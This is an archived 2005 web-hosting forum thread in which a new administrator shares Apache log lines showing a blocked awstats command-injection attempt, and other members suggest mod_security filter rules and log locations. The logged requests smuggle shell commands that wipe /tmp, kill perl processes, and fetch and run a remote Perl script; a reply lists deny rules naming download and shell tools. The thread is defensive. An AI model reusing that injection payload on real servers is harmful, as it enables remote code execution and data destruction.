PDA

View Full Version : My First hacking attempt

StingRay
08-23-2005, 12:46 PM
So i was looking through my access logs today and noticed the following.

63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:31 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -
63.251.232.60 - - [20/Aug/2005:06:01:32 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/putnew/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 -

Looks like they tried to use an exploit in awstats to attempt to compromise the server.
Being new to server administration, I'll wondering what steps i should take when i see things like this.

I do not currently have awstats on in WHM, so I don't think they would have been successful, but I do not know for certain.

Should I be looking closer at mod_security to make sure it is set up right? Is it configured from PowerVPS, or only basic defaults? Would mod_Security handle this?


Looking for some infomed advice :)
BornOnline
08-23-2005, 01:27 PM
Yes, mod_sec can stop these, but that would depend on the ruleset.

Mod_sec rules database (http://modsecrules.monkeydev.org/index.php)

Some of my rules

SecFilterSelective THE_REQUEST "system\("
SecFilterSelective THE_REQUEST "passthru\("
SecFilter "wget\x20"
SecFilter "uname\x20-a"
SecFilterSelective THE_REQUEST "/bin/ls"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilter "conf/httpd\.conf"
SecFilterSelective THE_REQUEST "///"
SecFilter "cd[[:space:]]/tmp"
SecFilter "cd[[:space:]]/var/tmp"
SecFilter "cd[[:space:]]/dev/shm"
SecFilter "gcc\x20-o"
SecFilter "cc\x20"
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
#SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
#SecFilterSelective THE_REQUEST "cvs "
#SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
charles
08-23-2005, 03:13 PM
Simple/dumb attacks like this are the reason we install mod_security and disable non-privileged use of wget by default.
canuck
08-23-2005, 06:57 PM
What log files do I check to see what's happening at my end ?
Fred
08-23-2005, 07:03 PM
The apache logs will show you this canuck...

There's so much attempt like that... don't wake up at nite for this or you'll never sleep stingray :)
You will notice the same for phpbb forums too...

In simple words, every popular web-app that have a vulnerability.
canuck
08-23-2005, 07:26 PM
Those logs located in the /var/log directory ?
Fred
08-23-2005, 08:02 PM
i believe they find it in /usr/local/apache/domlogs ??
You have separated files for each domain you host
You can download the apache raw file from whm ... in "download a raw apache log"

but in /usr/local/apache/logs you can find error_log where you'll find the errors for the whole server...
canuck
08-23-2005, 09:06 PM
Thanks and yes lots of stuff in these logs ...